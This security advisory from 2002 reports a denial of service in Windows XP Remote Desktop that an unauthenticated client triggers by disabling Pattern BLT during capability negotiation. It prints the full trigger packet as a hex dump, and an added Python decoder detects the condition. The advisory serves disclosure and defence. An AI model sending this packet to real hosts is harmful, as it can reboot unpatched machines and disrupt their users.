SECURITYVULNS:DOC:3503
Sep 18, 2002

Microsoft Windows XP Remote Desktop denial of service vulnerability

Published 2002-09-18 (vulners.com)

Vulnerable

Microsoft Windows XP Professional
Microsoft Windows .NET Standard Server Beta 3

Non-vulnerable

Microsoft Windows 2000 Server

Background

Windows XP Professional is subject to a remote denial of service when Remote
Desktop is enabled. Remote Desktop is XP Professional's single-user RDP
server (Terminal Services).

Discussion

At the start of the protocol there is a negotiation of client and server
graphics capabilities, in a packet called PDU Confirm Active. A block of
32 bytes in this packet allows the client to disable the drawing commands
that it does not support.

One of these apparently controls whether the Pattern BLT command is sent.
On Windows 2000 Server, disabling this command will make the server send
bitmaps instead of Pattern BLT commands. However, Windows XP Professional
apparently reboots when it tries to render patterns; since this happens
while the login screen is being drawn, this does not require the client to
have logged on or authenticated to the server. This applies to all
versions of the protocol tested (RDP 4.0, 5.0 and 5.1), and it is also
reproducible with Windows .NET Standard Server Beta 3.

Workaround

Disable Remote Desktop (from Control Panel, System, Remote, Remote
Desktop, deselect the option "Allow users to connect remotely to this
computer").

Exploit

Shown below are the unencrypted packet contents of the problematic PDU
Confirm Active packet. The only change from a normal client packet is from
01 to 00 on the line indicated.

c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01
4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00
03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00
00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05
00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00
58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00
2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00 <- was "2a 00 01 01"
00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00
00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00
00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00
00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00
08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00
00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00
0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00
0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00
00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00
0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00
fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00
fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01
40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00
01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00
14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00
00 0a 00 01
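The following decoder is an added example, not part of the original advisory and not Skygate's or Microsoft's code. It walks the share control header and the seventeen capability sets of the packet quoted above and decodes the Order Capability Set, so a defender can see which of the 32 orderSupport bytes a client has cleared, and in particular whether the Pattern BLT entry that this advisory concerns is the one switched off. The field names and the index-to-order mapping are taken from the public MS-RDPBCGR description of TS_CONFIRM_ACTIVE_PDU and TS_ORDER_CAPABILITYSET (the advisory cites the equivalent T.128 section 8.2.5); the function names are this example's own.

```python
"""Decode an RDP Confirm Active PDU and report which drawing orders the
client has disabled in the 32-byte orderSupport block of the Order
Capability Set. Field layout per MS-RDPBCGR (TS_CONFIRM_ACTIVE_PDU,
TS_ORDER_CAPABILITYSET); names below are this example's own."""
import struct
from typing import List, Optional, Tuple

# Unencrypted Confirm Active PDU, copied from the advisory above (annotation dropped).
CONFIRM_ACTIVE_HEX = """
c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01
4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00
03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00
00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05
00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00
58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00
2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00
00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00
00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00
00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00
00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00
08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00
00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00
0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00
0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00
00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00
0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00
fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00
fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01
40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00
01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00
14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00
00 0a 00 01
"""

PDUTYPE_CONFIRMACTIVEPDU = 0x3   # low nibble of pduType in the share control header
CAPSTYPE_ORDER = 0x0003
ORDER_SUPPORT_OFFSET = 36        # orderSupport[32] sits after the 16-byte terminalDescriptor etc.
ORDER_SUPPORT_LEN = 32
PATBLT_INDEX = 0x01              # TS_NEG_PATBLT_INDEX

# orderSupport index -> primary drawing order (TS_NEG_*_INDEX); gaps are unused indices.
ORDER_NAMES = {
    0x00: "DstBlt", 0x01: "PatBlt", 0x02: "ScrBlt", 0x03: "MemBlt", 0x04: "Mem3Blt",
    0x07: "DrawNineGrid", 0x08: "LineTo", 0x09: "MultiDrawNineGrid", 0x0B: "SaveBitmap",
    0x0F: "MultiDstBlt", 0x10: "MultiPatBlt", 0x11: "MultiScrBlt", 0x12: "MultiOpaqueRect",
    0x13: "FastIndex", 0x14: "PolygonSC", 0x15: "PolygonCB", 0x16: "Polyline",
    0x18: "FastGlyph", 0x19: "EllipseSC", 0x1A: "EllipseCB", 0x1B: "GlyphIndex",
}


def parse_hex_dump(text: str) -> bytes:
    """Turn a whitespace-separated hex dump into bytes."""
    return bytes.fromhex("".join(text.split()))


def parse_confirm_active(data: bytes) -> dict:
    """Walk the share control header and every capability set; raise on any inconsistency."""
    total_length, pdu_type, _pdu_source = struct.unpack_from("<HHH", data, 0)
    if total_length != len(data):
        raise ValueError(f"totalLength {total_length} != {len(data)} bytes supplied")
    if pdu_type & 0x0F != PDUTYPE_CONFIRMACTIVEPDU:
        raise ValueError(f"pduType 0x{pdu_type:04x} is not Confirm Active")
    share_id, _originator, len_source, len_combined = struct.unpack_from("<IHHH", data, 6)
    off = 16
    source_descriptor = data[off:off + len_source]
    off += len_source
    # lengthCombinedCapabilities covers numberCapabilities, pad2Octets and the sets themselves.
    caps_end = off + len_combined
    if caps_end != len(data):
        raise ValueError("lengthCombinedCapabilities does not reach the end of the PDU")
    (number_caps,) = struct.unpack_from("<H", data, off)
    off += 4
    caps: List[Tuple[int, bytes]] = []
    while off < caps_end:
        cap_type, cap_len = struct.unpack_from("<HH", data, off)
        if cap_len < 4 or off + cap_len > caps_end:
            raise ValueError(f"capability set 0x{cap_type:04x} overruns the PDU")
        caps.append((cap_type, data[off:off + cap_len]))
        off += cap_len
    if len(caps) != number_caps:
        raise ValueError(f"numberCapabilities says {number_caps}, parsed {len(caps)}")
    return {"total_length": total_length, "share_id": share_id, "number_caps": number_caps,
            "source_descriptor": source_descriptor.rstrip(b"\0").decode("ascii", "replace"),
            "caps": caps}


def order_support(pdu: dict) -> Optional[bytes]:
    """The 32-byte orderSupport array, or None if the client sent no Order Capability Set."""
    for cap_type, blob in pdu["caps"]:
        if cap_type == CAPSTYPE_ORDER:
            if len(blob) < ORDER_SUPPORT_OFFSET + ORDER_SUPPORT_LEN:
                raise ValueError("Order Capability Set too short for orderSupport")
            return blob[ORDER_SUPPORT_OFFSET:ORDER_SUPPORT_OFFSET + ORDER_SUPPORT_LEN]
    return None


def disabled_orders(support: bytes) -> List[str]:
    """Names of spec-defined orders whose orderSupport byte is zero, in index order."""
    return [name for idx, name in sorted(ORDER_NAMES.items()) if support[idx] == 0]


def patblt_disabled(pdu: dict) -> bool:
    """The condition this advisory describes: a client that declines Pattern BLT."""
    support = order_support(pdu)
    return support is not None and support[PATBLT_INDEX] == 0


if __name__ == "__main__":
    pdu = parse_confirm_active(parse_hex_dump(CONFIRM_ACTIVE_HEX))
    sup = order_support(pdu)
    print(f"{pdu['source_descriptor']}: {pdu['number_caps']} capability sets, "
          f"{pdu['total_length']} bytes")
    print("orderSupport:", sup.hex(" "))
    print("disabled orders:", disabled_orders(sup))
    print("PatBlt disabled (advisory trigger):", patblt_disabled(pdu))
```

On the packet above the decoder finds 17 capability sets filling exactly the 452 bytes the header announces, and reports PatBlt and GlyphIndex as the only spec-defined orders switched off. Note that under standard RDP security this PDU travels encrypted after the security exchange, so the check is useful on a decrypted capture or inside a server-side test harness rather than on a passive network sensor.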

References

Section 8.2.5 from T.128 Multipoint application sharing, Series T: Terminals
for telematic services, ITU-T.

Microsoft was notified on 16 April 2002.

Credits

Ben Cohen
[email protected]

Skygate Technology Ltd.
http://www.skygate.co.uk/
+44 (0)20 8542 7856